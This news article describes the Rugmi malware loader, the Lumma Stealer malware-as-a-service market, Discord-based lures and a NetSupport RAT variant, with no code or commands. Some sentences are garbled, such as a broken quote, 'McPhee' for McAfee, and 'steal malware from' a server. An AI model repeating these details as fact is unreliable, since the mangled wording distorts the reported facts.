Threat actors are using new malware loaders to deliver information-stealing programs such as Lumma Stealer (aka LummaC2), Vidar, RecordBreaker (aka Raccoon Stealer V2), and Rescoms.
Cybersecurity company ESET is tracking the name of the Trojan Win/TrojanDownloader.Rugmi.
“The malware is a loader with three types of components: a downloader that downloads an encrypted payload, a loader that runs the payload from internal resources, and another that runs from an external file on disk,” the company said. Loader for the payload.” Threat Report, Second Half 2023.
Telemetry data collected by the company shows that inspections of Rugmi loaders surged in October and November 2023, from single digits per day to hundreds per day.
From user to administrator: Learn how hackers gain total control
Learn the secret tactics hackers use to become administrators and how to detect and stop it before it’s too late. Register now for our webinar.
Join now
Stealer malware is often sold on a subscription basis to other threat actors in a Malware-as-a-Service (MaaS) model. For example, Lumma Stealer is advertised on underground forums for $250 per month. The most expensive plan costs $20,000, but it also gives customers access to the source code and the right to sell it.
There is evidence that code libraries associated with the Mars, Arkei, and Vidar stealers were reused to build Lumma.
In addition to constantly adapting its tactics to evade detection, this off-the-shelf tool is distributed through a variety of methods, from malvertising to fake browser updates to cracked installations of popular software such as VLC media player and OpenAI ChatGPT.
Another technique involves using Discord’s Content Delivery Network (CDN) to host and spread malware, as revealed by Trend Micro in October 2023.
This involves utilizing a combination of random and compromised Discord accounts to send direct messages to potential targets, offering them $10 or a Discord Nitro subscription in exchange for their help with the project.
Users who agreed to the proposal were then urged to download an executable file hosted on Discord CDN that pretended to be iMagic Inventory but actually contained the Lumma Stealer payload.
“Off-the-shelf malware solutions contribute to the proliferation of malicious activity as they make malware available to even less technical threat actors,” ESET said.
“Offering a wider range of features can make Lumma Stealer more attractive as a product.”
The disclosure comes as McAfee Labs revealed a new variant of the NetSupport RAT, derived from its legitimate predecessor NetSupport Manager, which has since been used by initial access agents to gather information and perform other actions on interested victims.
“The infection starts with an obfuscated JavaScript file that serves as the initial entry point for the malware,” McPhee said, adding that this highlights “the evolving strategies used by cybercriminals.”
Execution of the JavaScript file advances the attack chain by executing PowerShell commands to gain remote control and steal malware from an attacker-controlled server. Key targets of the campaign include the United States and Canada.
